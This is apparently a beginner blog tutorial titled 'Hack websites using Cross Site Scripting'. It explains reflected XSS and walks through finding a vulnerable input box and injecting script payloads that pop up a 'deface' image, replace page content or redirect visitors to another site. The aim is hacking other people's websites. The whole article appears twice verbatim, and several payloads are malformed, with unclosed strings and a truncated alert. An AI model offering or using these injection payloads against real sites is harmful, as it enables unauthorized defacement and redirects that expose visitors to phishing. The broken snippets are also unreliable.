Hack websites using Cross Site Scripting :
******************************
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
Types of XSS vulnerabilities:
1.Persistent
2.Non persistent
In this post i am going to explain about the non persistent vulnerability.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.
What can a hacker do with this??
XSS Attacks be used for the following:
•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content
Steps to hack:
Step 1: Find vulnerability.
Step 2: Deface.
Finding out the vulnerability:
1)Find a textbox in the site or something where you can submit text.
2)Type in the following:
<script>alert("hackinginceptio
3)If it is vulnerable you will see "Hackinginception" on a dialogue Box. Now Click Ok.
Defacing:
There are some ways to deface a site when you find a XSS vulnerability.
1) Makes A Picture Pop-Up:
"><script>location="www.website.com/yourdefacepic";</script>
2) Replace The Content Of The Page By An Image:
<img src="yoursite.com/yourdefacepic/>
3)Redirect To A Website
<script>window.location="http://www.yoursite.com/"</script>
NOTE:
Since this is a non-persistent attack,the changes made by you will not affect the website. But the hackers use these vulnerabilities to steal the information of the visitors of those sites.
This Tutorial is for beginners.
Hope you liked this article... Leave your comments if you have any doubts or suggestions...
******************************
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.
Types of XSS vulnerabilities:
1.Persistent
2.Non persistent
In this post i am going to explain about the non persistent vulnerability.
Non persistent XSS vulnerability is the Most Common Type of XSS Flaw. It is a Server Side Vulnerability
When a Web Server takes any input from a User and returns the same back to the User without any Validation, This leads to a Non-Persistent XSS Vulnerability.
What can a hacker do with this??
XSS Attacks be used for the following:
•Compromising and Hijacking Accounts
•Stealing User Cookies
•Defacing Websites
•Phishing Attacks
•Posting False or Hostile Content
Steps to hack:
Step 1: Find vulnerability.
Step 2: Deface.
Finding out the vulnerability:
1)Find a textbox in the site or something where you can submit text.
2)Type in the following:
<script>alert("hackinginceptio
3)If it is vulnerable you will see "Hackinginception" on a dialogue Box. Now Click Ok.
Defacing:
There are some ways to deface a site when you find a XSS vulnerability.
1) Makes A Picture Pop-Up:
"><script>location="www.website.com/yourdefacepic";</script>
2) Replace The Content Of The Page By An Image:
<img src="yoursite.com/yourdefacepic/>
3)Redirect To A Website
<script>window.location="http://www.yoursite.com/"</script>
NOTE:
Since this is a non-persistent attack,the changes made by you will not affect the website. But the hackers use these vulnerabilities to steal the information of the visitors of those sites.
This Tutorial is for beginners.
Hope you liked this article... Leave your comments if you have any doubts or suggestions...
No comments:
Post a Comment